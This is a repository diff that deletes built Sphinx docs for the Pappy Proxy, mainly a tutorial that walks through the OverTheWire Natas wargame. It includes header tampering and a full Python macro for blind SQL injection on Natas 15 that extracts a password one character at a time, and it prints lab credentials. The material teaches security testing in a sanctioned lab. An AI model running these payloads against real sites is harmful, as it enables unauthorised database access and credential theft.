.. automodule:: pappyproxy.proxy
:members:
:undoc-members:
:show-inheritance:
pappyproxy.repeater module
--------------------------
.. automodule:: pappyproxy.repeater
:members:
:undoc-members:
:show-inheritance:
pappyproxy.session module
-------------------------
.. automodule:: pappyproxy.session
:members:
:undoc-members:
:show-inheritance:
pappyproxy.util module
----------------------
.. automodule:: pappyproxy.util
:members:
:undoc-members:
:show-inheritance:
Module contents
---------------
.. automodule:: pappyproxy
:members:
:undoc-members:
:show-inheritance:

720
docs/build/html/_sources/tutorial.txt vendored
Unescape View File

@ -1,720 +0,0 @@
The Pappy Proxy Tutorial
************************
.. contents:: Table of Contents
:local:
Getting Set Up
==============
Introduction
------------
This is a quick tutorial to get you started using Pappy like a pro. To do this, we'll be going through from `Natas <http://overthewire.org/wargames/natas/>`_. If you haven't done it yet and don't want it spoiled, I suggest giving it a try with Burp since we'll be telling you all the answers right off the bat.
Getting Started
---------------
The first thing you'll need to do is get Pappy installed.
Install from pypi::
$ pip install pappy
or install from source::
$ git clone --recursive https://github.com/roglew/pappy-proxy.git
$ cd pappy-proxy
$ pip install .
.. note::
Pappy only supports OS X and Linux! Nothing will work on Windows, sorry!
That was easy! Make a project directory anywhere for Natas and fire up Pappy.::
$ mkdir natas
$ cd natas
Copying default config to ./config.json
Proxy is listening on port 8000
pappy>
If you look at what's in the directory, you'll notice that there's a ``data.db`` file and a ``config.json`` file.
* ``data.db`` is a SQLite file that stores all the (in-scope) requests that pass through the proxy
* ``config.json`` stores settings for the proxy
You don't need to touch either of these right now. Just hop back into Pappy.
Installing Pappy's CA Cert
--------------------------
In order to intercept HTTPS requests, you'll need to add a CA cert to your browser. Installing the cert allows Pappy to act like a certificate authority and sign certificates for whatever it wants without your browser complaining.
To generate certificates, you'll use the ``gencerts`` command. This will generate certificates in Pappy's directory. By default, all projects will use the certs in this directory, so you should only have to generate/install the certificates once.::
pappy> gencerts
This will overwrite any existing certs in /home/anonymouse/pappy/pappyproxy/certs. Are you sure?
(y/N) y
Generating certs to /home/anonymouse/pappy/pappyproxy/certs
Generating private key... Done!
Generating client cert... Done!
pappy>
The directory that the certs get put in may be different for you. Next, you'll need to add the generated ``certificate.crt`` file to your browser. This is different for each browser.
Installing the Cert in Firefox
++++++++++++++++++++++++++++++
1. Open Firefox
2. Go to ``Preferences -> Advanced -> View Certificates -> Authorities``
3. Click ``Import``
4. Navigate to the directory where the certs were generated and double click ``certificate.crt``
Installing the Cert in Chrome
+++++++++++++++++++++++++++++
1. Open Chrome
2. Go to ``Preferences -> Show advanced settings -> HTTPS/SSL -> Manage Certificates -> Authorities``
3. Click ``Import``
4. Navigate to the directory where the certs were generated and double click ``certificate.crt``
Installing the Cert in Safari
+++++++++++++++++++++++++++++
1. Use Finder to navigate to the directory where the certs were generated
2. Double click the cert and follow the prompts to add it to your system keychain
Installing the Cert in Internet Explorer
++++++++++++++++++++++++++++++++++++++++
1. No.
Configuring Your Browser
------------------------
Next, you need to configure your browser to use the proxy. This is generally done using a browser extension. This tutorial won't cover how to configure these plugins. Pappy runs on localhost on port 8000. This can be changed in ``config.json``, but don't worry about that right now.
.. note::
Configure your browser extension to use the proxy server at **loalhost** on **port 8000**
Here are some proxy plugins that should work
* Firefox: `FoxyProxy <https://addons.mozilla.org/en-us/firefox/addon/foxyproxy-standard/>`_
* Chrome: `Proxy SwitchySharp <https://chrome.google.com/webstore/detail/proxy-switchysharp/dpplabbmogkhghncfbfdeeokoefdjegm?hl=en>`_
Testing it Out
--------------
Start up Pappy in Lite mode by running ``pappy -l``, enable the proxy in your browser, then navigate to a website::
/pappynatas/ $ pappy -l
Temporary datafile is /tmp/tmp5AQBrH
Proxy is listening on port 8000
pappy> ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
8 GET vitaly.sexy /favicon.ico 404 Not Found 0 114 0.21 --
7 GET vitaly.sexy /favicon.ico 404 Not Found 0 114 0.22 --
6 GET vitaly.sexy /esr1.jpg 200 OK 0 17653 0.29 --
5 GET vitaly.sexy /netscape.gif 200 OK 0 1135 0.22 --
4 GET vitaly.sexy /construction.gif 200 OK 0 28366 0.26 --
3 GET vitaly.sexy /vitaly2.jpg 200 OK 0 2034003 1.34 --
2 GET vitaly.sexy / 200 OK 0 1201 0.21 --
1 GET vitaly.sexy / 301 Moved Permanently 0 178 0.27 --
pappy> quit
Deleting temporary datafile
Make sure that the request you made appears on the list. When you quit, the temporary data file will be deleted, so no cleanup will be required!
The Tutorial
============
Setting the Scope
-----------------
The first thing we'll do is set up Pappy so that it only intercepts requests going to ``*.natas.labs.overthewire.org``::
pappy> filter host containsr "natas\.labs\.overthewire\.org$"
pappy> scope_save
What these commands do:
1. Make the current context only include requests whose host ends in ``natas.labs.overthewire.org``.
2. Save the current context as the scope
The context is basically requests that pass a list of rules. In this case, we have one rule that says that in order for a request to be in the current context, it must pass the regexp ``natas\.labs\.overthewire\.org$``. When we save the scope, we're saying that any request that doesn't pass this regexp is out of scope and shouldn't be touched.
If this doesn't make sense, don't worry, we'll come back to this.
Natas 0
-------
First, go to `<http://natas0.natas.labs.overthewire.org>`_ and log in with the default creds of ``natas0`` / ``natas0``. You should see a site that says "You can find the password for the next level on this page". You don't need Pappy for this one.
1. Right click the page and select "view source"
2. Read the password for natas1
3. Visit `<http://natas1.natas.labs.overthewire.org>`_ and log in with the username ``natas1`` and the password you found.
Natas 1
-------
Haha! This is the same as natas0, but they got tricky and shut off right-clicking. There's still ways to view the source in the browser, but we'll use Pappy here. The commands we'll learn here are ``ls``, ``vfq``, and ``vfs``.
* ``ls`` lists the most current requests that are in the current context. You'll be using this a lot to get the IDs of requests you want to do things with.
* ``vfq <reqid>`` prints the full request of a request you specify
* ``vfs <reqid>`` prints the full response to a request you specify
So to solve natas1, we'll want to view the full response to our request to the page::
pappy> ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
16 GET natas1.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
15 GET natas1.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
14 GET natas1.natas.labs.overthewire.org / 200 OK 0 1063 0.27 --
13 GET natas1.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.27 --
12 GET natas0.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
11 GET natas0.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.26 --
10 GET natas.labs.overthewire.org /img/wechall.gif 200 OK 0 9279 0.28 --
9 GET natas.labs.overthewire.org /js/wechall.js 200 OK 0 1074 0.50 --
8 GET natas.labs.overthewire.org /js/wechall-data.js 200 OK 0 564 0.48 --
7 GET natas.labs.overthewire.org /js/jquery-ui.js 200 OK 0 435844 1.37 --
6 GET natas.labs.overthewire.org /js/jquery-1.9.1.js 200 OK 0 268381 1.20 --
4 GET natas.labs.overthewire.org /css/wechall.css 200 OK 0 677 0.48 --
5 GET natas.labs.overthewire.org /css/jquery-ui.css 200 OK 0 32046 0.49 --
3 GET natas.labs.overthewire.org /css/level.css 200 OK 0 1332 0.48 --
2 GET natas0.natas.labs.overthewire.org / 200 OK 0 918 0.26 --
1 GET natas0.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.26 --
pappy> vfs 14
HTTP/1.1 200 OK
Date: Fri, 18 Dec 2015 19:47:21 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Fri, 14 Nov 2014 10:32:33 GMT
ETag: "427-507cf258a5240-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1063
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
... snip ...
<!--The password for natas2 is [password] -->
... snip ...
pappy>
Yay!
Natas 2
-------
When you visit this page, you get a message saying "There is nothing on this page". That is probably a blatant lie. Let's see what was in that response.::
pappy> ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
30 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
29 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
28 GET natas2.natas.labs.overthewire.org /files/pixel.png 200 OK 0 303 0.27 --
27 GET natas2.natas.labs.overthewire.org / 200 OK 0 872 0.27 --
26 GET natas2.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.27 --
... snip ...
pappy> vfs 27
HTTP/1.1 200 OK
... snip ...
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>
pappy>
So the only suspicious thing is ``<img src="files/pixel.png">``. I'll let you figure out the rest ;)
Natas 3
-------
This one doesn't require Pappy. Just view the ``robots.txt`` file.
Finding Your Passwords Later (How to Use Filters)
-------------------------------------------------
This section will explain how to use Pappy's filters to find passwords to levels you've already completed. Every in-scope request and response that goes through Pappy is stored in the ``data.db`` file in your project directory. We can use filter commands to search through these requests to find resposes with passwords.
Filters
+++++++
Here are the commands we'll learn:
1. ``filter <filter string>`` / ``f <filter string>`` Add a filter that limits which requests are included in the current context
2. ``fu`` Remove the most recently applied filter
3. ``sr`` Reset the context so that it matches the scope
4. ``filter_clear`` Remove all filters from the context, including the filters applied by the scope
5. ``fls`` Show all currently applied filters
The most complicated of these is the ``filter`` command since it takes a filter string as an argument. All a filter string is is a string that defines which requests will pass the filter. Anything that doesn't pass the filter will be removed from the context. Most filter strings are of the format ``<field> <comparer> <value>``. For example::
host is www.target.org
field = "host"
comparer = "is"
value = "www.target.org"
This filter will only match requests whose host is exactly ``www.target.org``. When defining our scope, we applied a filter using a ``containsr`` comparer. This matches any request where the field matches a regular expression. Here are a few fields and comparers:
Commonly used fields
* ``all`` The full text of the request and the response
* ``host`` The hostname of where the request is sent
* ``path`` The target path of the request. ie ``/path/to/page.php``
* ``verb`` The HTTP verb. ie ``POST`` or ``GET`` (case sensitive!)
* ``body`` The data section (the body) of either the request or the response
Commonly used comparers
* ``is <value>`` The field exactly matches the value
* ``contains <value>`` / ``ct <value>`` The field contains a value
* ``containsr <regexp>`` / ``ctr <regexp>`` The field matches a regexp. You may want to surround the regexp in quotes since a number of regexp characters are also control characters in the command line
You can find the rest of the fields and comparers (including some more complex ones) in the actual documentation.
Once you've applied some filters, ``ls`` will only show items that pass all the applied filters. If you want to return to viewing all in-scope items, use ``sr``. If you want to remove the last applied filter, use ``fu``.
Finding Passwords
+++++++++++++++++
While we can't find all the passwords with one filter, if we remember how we got the password, we can find it pretty quickly
For natas0 and natas1, the responses had a phrase like "the password is abc123". So we can filter out anything that doesn't have the word "password" in it.::
pappy> ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
52 GET natas4.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.26 --
51 GET natas4.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
50 GET natas4.natas.labs.overthewire.org / 200 OK 0 1019 0.27 --
49 GET natas4.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.26 --
48 GET natas3.natas.labs.overthewire.org /s3cr3t/users.txt 200 OK 0 40 0.27 --
46 GET natas3.natas.labs.overthewire.org /icons/text.gif 200 OK 0 229 0.53 --
47 GET natas3.natas.labs.overthewire.org /icons/back.gif 200 OK 0 216 0.53 --
45 GET natas3.natas.labs.overthewire.org /icons/blank.gif 200 OK 0 148 0.53 --
44 GET natas3.natas.labs.overthewire.org /s3cr3t/ 200 OK 0 957 0.26 --
43 GET natas3.natas.labs.overthewire.org /s3cr3t 301 Moved Permanently 0 354 0.27 --
42 GET natas3.natas.labs.overthewire.org /robots.txt 200 OK 0 33 0.29 --
41 GET natas3.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.26 --
40 GET natas3.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.28 --
39 GET natas3.natas.labs.overthewire.org / 200 OK 0 923 0.26 --
38 GET natas3.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.28 --
37 GET natas2.natas.labs.overthewire.org /files/users.txt 200 OK 0 145 0.28 --
36 GET natas2.natas.labs.overthewire.org /icons/text.gif 200 OK 0 229 0.47 --
35 GET natas2.natas.labs.overthewire.org /icons/image2.gif 200 OK 0 309 0.47 --
34 GET natas2.natas.labs.overthewire.org /icons/back.gif 200 OK 0 216 0.47 --
33 GET natas2.natas.labs.overthewire.org /icons/blank.gif 200 OK 0 148 0.47 --
32 GET natas2.natas.labs.overthewire.org /files/ 200 OK 0 1153 0.26 --
31 GET natas2.natas.labs.overthewire.org /files 301 Moved Permanently 0 353 0.27 --
30 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
29 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
28 GET natas2.natas.labs.overthewire.org /files/pixel.png 200 OK 0 303 0.27 --
pappy> f body ct password
pappy> ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
49 GET natas4.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.26 --
38 GET natas3.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.28 --
37 GET natas2.natas.labs.overthewire.org /files/users.txt 200 OK 0 145 0.28 --
26 GET natas2.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.27 --
20 GET natas.labs.overthewire.org /js/wechall.js 200 OK 0 1074 0.47 --
24 GET natas.labs.overthewire.org /js/jquery-1.9.1.js 200 OK 0 268381 1.20 --
17 GET natas1.natas.labs.overthewire.org / 200 OK 0 1063 0.30 --
14 GET natas1.natas.labs.overthewire.org / 200 OK 0 1063 0.27 --
13 GET natas1.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.27 --
9 GET natas.labs.overthewire.org /js/wechall.js 200 OK 0 1074 0.50 --
6 GET natas.labs.overthewire.org /js/jquery-1.9.1.js 200 OK 0 268381 1.20 --
2 GET natas0.natas.labs.overthewire.org / 200 OK 0 918 0.26 --
1 GET natas0.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.26 --
pappy>
It looks like requests 2 and 14 are the ones we're looking for (we know the password is on the page and those are the requests to / that have a 200 OK response). Use ``vfs`` to look at the response and you'll get the passwords again! It looks like we also found the password from natas2 (the request to /s3cr3t/users.txt).
Anyways, back to Natas!
Natas 4
-------
When we visit this page, we get an error saying that they will only display the password if we visit from ``http://natas5.natas.labs.overthewire.org/``. How does a website track where you came from? The Referer header! Where's that defined? In a header! Do we control the headers? Yes! So all we have to do is set the Referer header to be the correct URL and we're golden.
To do this, we'll be using Pappy's interceptor. The interceptor lets you stop a request from the browser, edit it, then send it to the server. These are the commands we're going to learn:
* ``ic <req|rsp>+`` Begin interception mode. Intercepts requests and/or responses as decided by the arguments given in the command. ``ic req`` will only intercept requests, ``ic rsp`` will only intercept responses, and ``ic req rsp`` will intercept both.
In this case, we only want to intercept requests, so we'll run ``ic req``::
pappy> ic req
And we'll get a screen that says something like::
Currently intercepting: Requests
0 item(s) in queue.
Press 'n' to edit the next item or 'q' to quit interceptor.
Now refresh the page in your browser. The page will hang like it's taking a long time to load. Go back to Pappy, and now the interceptor will say something like::
Currently intercepting: Requests
1 item(s) in queue.
Press 'n' to edit the next item or 'q' to quit interceptor.
Press ``n`` and the request will be opened for editing! Which editor is used is defined by the ``EDITOR`` environment variable. Use the text editor to add a ``Referer`` header (note that there's only one r)::
GET / HTTP/1.1
Host: natas4.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664
Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
Connection: keep-alive
Cache-Control: max-age=0
Referer: http://natas5.natas.labs.overthewire.org/
Save and quit, then press ``q`` to quit the interceptor. Go back to the browser and you should have the password for natas5! Yay!
Now if you run ls, you'll notice that the request we made has a ``q`` in the ``Mngl`` column. This means that we mangled the request. If there's an ``s`` in that column, it means we mangled the response. If we ever want to refer to the unmangled version of the request, just prefix the id with a u. For example, you can get the unmangled version of request ``12`` by using the id ``u12``.
Natas 5
-------
This one starts with a screen saying you're not logged in. This is fine. For this one, you'll need to use the interceptor to edit the value of a cookie. I'll let you figure that one out.
Natas 6
-------
This one you should be able to get
Natas 7
-------
You should get this one. Note the hint on the `overthewire website <http://overthewire.org/wargames/natas/>`_: All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5.
Natas 8
-------
You should be able to get this one. If it sucks, google it.
Natas 9
-------
For this one, when you view the source you'll notice they're taking value you entered and inserting it directly into a command line command to grep a file. What we want to do is insert our own arguments to the command. For this one, we will learn how to use the repeater. Here is the command we will learn:
* ``rp <reqid>`` Open the vim repeater with the given request
* ``<leader>f`` (In the repeater) forward the request
.. note::
Use ``:wq!`` to quit the repeater without having to save buffers
.. note::
You must know the basics of how to use vim for the repeater and have a key bound to the leader. You can find more information on the leader key `here <https://stackoverflow.com/questions/1764263/what-is-the-leader-in-a-vimrc-file>`_. By default <leader> is bound to ``\``.
Submit a request then open that request in the repeater::
pappy> ls
196 GET natas9.natas.labs.overthewire.org /index.php?needle=ball&submit=Search 200 OK 0 1686 0.27 --
195 GET natas9.natas.labs.overthewire.org /index-source.html 200 OK 0 1952 0.27 --
... snip ...
pappy> rp 196
Vim will open up in a vertical split with the request on the left and the response on the right.
In the repeater, you edit the response on the left, then press the ``<leader>`` key then ``f`` to submit the modified request (note that your cursor must be in the left window). The response will then be put in the right window. This makes it easy to quickly make requests which are all slight variations of each other.
In this case, we'll be editing the ``needle`` get parameter. Try changing "ball" to "bill" and submitting it. You'll notice that the output in the right window changes to contain words that have the word "bill" in them. The repeater will make it easy to make tweaks to your payload and get quick feedback without having to use the browser.
Use the repeater to solve this challenge (you may need to url encode some characters by hand, unfortunately).
Skip a few... Natas 15
----------------------
All the challenges up to this point should be doable with the repeater/interceptor. Natas15 is where things get hairy though. This is a blind SQL injection, and you'll have to write a script to do it. Luckily for us, writing scripts using Pappy is easy. If you're lazy and don't want to actually do the challenges, google the password for natas15 then come back.
Commands we'll learn:
* ``gma <name> <reqid(s)>`` Generate a macro with objects pre-defined for the given requests
* ``lma`` Load macros
* ``rma <name> [args]`` Run a macro, optionally with arguments
So the first thing we'll do is submit a request to have a base request that we can modify. Submit a request with any username. You should get a response back saying the user doesn't exist. Now we'll generate a macro and use that request as a base for our script::
pappy> ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
224 POST natas15.natas.labs.overthewire.org /index.php 200 OK 14 937 0.27 --
223 POST natas15.natas.labs.overthewire.org /index.php 200 OK 12 937 0.27 --
222 GET natas15.natas.labs.overthewire.org /index-source.html 200 OK 0 3325 0.28 --
221 GET natas15.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 308 0.25 --
220 GET natas15.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 308 0.27 --
219 GET natas15.natas.labs.overthewire.org / 200 OK 0 1049 0.37 --
218 GET natas15.natas.labs.overthewire.org / 401 Unauthorized 0 480 0.27 --
... snip ...
pappy> gma brute 224
Wrote script to macro_brute.py
pappy>
Now open up ``macro_brute.py`` in your favorite text editor. You should have a script that looks like this::
from pappyproxy.http import Request, get_request, post_request
from pappyproxy.context import set_tag
MACRO_NAME = 'Macro 41855887'
SHORT_NAME = ''
###########
## Requests
# It's suggested that you call .copy() on these and then edit attributes
# as needed to create modified requests
##
req1 = Request((
'POST /index.php HTTP/1.1\r\n'
'Host: natas15.natas.labs.overthewire.org\r\n'
'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0\r\n'
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
'Accept-Language: en-US,en;q=0.5\r\n'
'Accept-Encoding: gzip, deflate\r\n'
'Referer: http://natas15.natas.labs.overthewire.org/\r\n'
'Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664\r\n'
'Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==\r\n'
'Connection: keep-alive\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n'
'Content-Length: 14\r\n'
'\r\n'
'username=admin'
))
def run_macro(args):
# Example:
# req = req0.copy() # Copy req0
# req.submit() # Submit the request to get a response
# print req.response.raw_headers # print the response headers
# req.save() # save the request to the data file
# or copy req0 into a loop and use string substitution to automate requests
pass
Pappy will generate a script and create a ``Request`` object that you can use. Check out the real documentation to see everything you can do with a ``Request`` object. For now you just need to know a few things about it:
* :func:`~pappyproxy.http.Request.submit` Submit the request and store the response object
* :func:`~pappyproxy.http.Request.save` Save the request/response to the data file
* ``post_params`` A :class:`~pappyproxy.http.RepeatableDict` that represents the post parameters of the request. Can set/get prameters the same way as a dictionary.
It is suggested you go through the documentation to learn the rest of the attributes/functions.
To start out simple, we'll write a macro that lets us check a username from the Pappy console. To define a function, you define the ``run_macro`` function. The function is passed a list of arguments which represent the arguments entered. Here a ``run_macro`` function that we can define that will check if a user exists::
def run_macro(args):
to_check = args[0] # get the username to check
r = req1.copy() # make a copy of the base request
r.post_params['username'] = to_check # set the username param of the request
r.submit() # submit the request
if "This user doesn't exist." in r.response.raw_data: # check if the username is valid
print "%s is not a user" % to_check
else:
print "%s is a user!" % to_check
Then to run it::
pappy> lma
Loaded "<Macro Macro 41855887 (brute)>"
pappy> rma brute admin
admin is not a user
pappy> rma brute fooooo
fooooo is not a user
pappy> rma brute natas16
natas16 is a user!
pappy>
Awesome! Notice how we didn't have to deal with authentication either. This is because the authentication is handled by the ``Authorization`` header which was included in the generated request.
Time to add the SQL injection part. If we look at the source, we see that this is the SQL query that checks the username::
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
So to escape it, we use a payload like::
username" OR 1=1; #
In this case, any username that ends in ``" OR 1=1; #`` will be considered a valid username. Let's try this out::
pappy> rma brute "foo\" OR 1=1;"
foo" OR 1=1; is a user!
pappy> rma brute "fooooooo\" OR 1=1;"
fooooooo" OR 1=1; is a user!
pappy>
Great! Now we can check any true/false condition we want. In this case, we want to check if a certain character is at a certain position in the ``password`` column. We do this with the ``ASCII`` and ``SUBSTRING`` functions. So something like this will check if the first character is an ``A``.::
'natas16" AND ASCII(SUBSTRING(password, 0, 1)) = 41; #'
Alright, let's update our macro to find the first character of the password.::
from pappyproxy.http import Request, get_request, post_request
from pappyproxy.context import set_tag
MACRO_NAME = 'Macro 41855887'
SHORT_NAME = ''
###########
## Requests
# It's suggested that you call .copy() on these and then edit attributes
# as needed to create modified requests
##
req1 = Request((
'POST /index.php HTTP/1.1\r\n'
'Host: natas15.natas.labs.overthewire.org\r\n'
'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0\r\n'
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
'Accept-Language: en-US,en;q=0.5\r\n'
'Accept-Encoding: gzip, deflate\r\n'
'Referer: http://natas15.natas.labs.overthewire.org/\r\n'
'Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664\r\n'
'Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==\r\n'
'Connection: keep-alive\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n'
'Content-Length: 14\r\n'
'\r\n'
'username=admin'
))
def check_char(char, pos):
payload = 'natas16" AND ASCII(SUBSTRING(password, %d, 1)) = %d; #' % (pos, ord(char))
r = req1.copy()
r.post_params['username'] = payload
r.submit()
if "This user doesn't exist." in r.response.raw_data:
return False
else:
return True
def run_macro(args):
valid_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890"
for c in valid_chars:
print 'Trying %s...' % c
if check_char(c, 1):
print '%s is the first char!' % c
return
print "The script didn't work"
And when we run it...::
pappy> lma
Loaded "<Macro Macro 41855887 (brute)>"
pappy> rma brute
Trying a...
Trying b...
Trying c...
Trying d...
... snip ...
Trying U...
Trying V...
Trying W...
W is the first char!
pappy>
We find the first character! Woo! Next we just have to do this for each position. Even through we don't know the length of the password, we will know that the password is over when none of the characters are valid. So let's update our macro::
import sys
from pappyproxy.http import Request, get_request, post_request
from pappyproxy.context import set_tag
MACRO_NAME = 'Macro 41855887'
SHORT_NAME = ''
###########
## Requests
# It's suggested that you call .copy() on these and then edit attributes
# as needed to create modified requests
##
req1 = Request((
'POST /index.php HTTP/1.1\r\n'
'Host: natas15.natas.labs.overthewire.org\r\n'
'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0\r\n'
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
'Accept-Language: en-US,en;q=0.5\r\n'
'Accept-Encoding: gzip, deflate\r\n'
'Referer: http://natas15.natas.labs.overthewire.org/\r\n'
'Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664\r\n'
'Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==\r\n'
'Connection: keep-alive\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n'
'Content-Length: 14\r\n'
'\r\n'
'username=admin'
))
def check_char(char, pos):
payload = 'natas16" AND ASCII(SUBSTRING(password, %d, 1)) = %d; #' % (pos, ord(char))
r = req1.copy()
r.post_params['username'] = payload
r.submit()
if "This user doesn't exist." in r.response.raw_data:
return False
else:
return True
def run_macro(args):
valid_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890"
password = ''
done = False
while True:
done = True
for c in valid_chars:
# Print the current char to the current line
print c,
sys.stdout.flush()
# Check the current char
if check_char(c, len(password)+1):
# We got the correct char!
password += c
# Print it to the screen
print ''
print '%s is char %d!' % (c, len(password)+1)
print 'The password so far is %s' % password
# We have to do another round
done = False
break
if done:
# We got through the entire alphabet
print ''
print 'Done! The password is "%s"' % password
break
Then we run it::
pappy> lma
Loaded "<Macro Macro 41855887 (brute)>"
pappy> rma brute
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W
W is char 1!
The password so far is W
a
a is char 2!
The password so far is Wa
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I
I is char 3!
The password so far is WaI
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H
H is char 4!
The password so far is WaIH
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E
... snip ...
The password so far is WaIHEacj63wnNIBROHeqi3p9t0m5nh
a b c d e f g h i j k l m
m is char 31!
The password so far is WaIHEacj63wnNIBROHeqi3p9t0m5nhm
a b c d e f g h
h is char 32!
The password so far is WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9 0
Done! The password is "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"
pappy>
Boom! There it is!
Conclusion
==========
That's pretty much all you need to get started with Pappy. Make sure to go through the documentation to learn about all the other features that weren't covered in this tutorial. Hopefully you didn't find Pappy too hard to use and you'll consider it for your next engagement.

BIN
docs/build/html/_static/ajax-loader.gif vendored
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 673 B

599
docs/build/html/_static/basic.css vendored
Unescape View File

@ -1,599 +0,0 @@
/*
* basic.css
* ~~~~~~~~~
*
* Sphinx stylesheet -- basic theme.
*
* :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
* :license: BSD, see LICENSE for details.
*
*/
/* -- main layout ----------------------------------------------------------- */
div.clearer {
clear: both;
}
/* -- relbar ---------------------------------------------------------------- */
div.related {
width: 100%;
font-size: 90%;
}
div.related h3 {
display: none;
}
div.related ul {
margin: 0;
padding: 0 0 0 10px;
list-style: none;
}
div.related li {
display: inline;
}
div.related li.right {
float: right;
margin-right: 5px;
}
/* -- sidebar --------------------------------------------------------------- */
div.sphinxsidebarwrapper {
padding: 10px 5px 0 10px;
}
div.sphinxsidebar {
float: left;
width: 230px;
margin-left: -100%;
font-size: 90%;
}
div.sphinxsidebar ul {
list-style: none;
}
div.sphinxsidebar ul ul,
div.sphinxsidebar ul.want-points {
margin-left: 20px;
list-style: square;
}
div.sphinxsidebar ul ul {
margin-top: 0;
margin-bottom: 0;
}
div.sphinxsidebar form {
margin-top: 10px;
}
div.sphinxsidebar input {
border: 1px solid #98dbcc;
font-family: sans-serif;
font-size: 1em;
}
div.sphinxsidebar #searchbox input[type="text"] {
width: 170px;
}
div.sphinxsidebar #searchbox input[type="submit"] {
width: 30px;
}
img {
border: 0;
max-width: 100%;
}
/* -- search page ----------------------------------------------------------- */
ul.search {
margin: 10px 0 0 20px;
padding: 0;
}
ul.search li {
padding: 5px 0 5px 20px;
background-image: url(file.png);
background-repeat: no-repeat;
background-position: 0 7px;
}
ul.search li a {
font-weight: bold;
}
ul.search li div.context {
color: #888;
margin: 2px 0 0 30px;
text-align: left;
}
ul.keywordmatches li.goodmatch a {
font-weight: bold;
}
/* -- index page ------------------------------------------------------------ */
table.contentstable {
width: 90%;
}
table.contentstable p.biglink {
line-height: 150%;
}
a.biglink {
font-size: 1.3em;
}
span.linkdescr {
font-style: italic;
padding-top: 5px;
font-size: 90%;
}
/* -- general index --------------------------------------------------------- */
table.indextable {
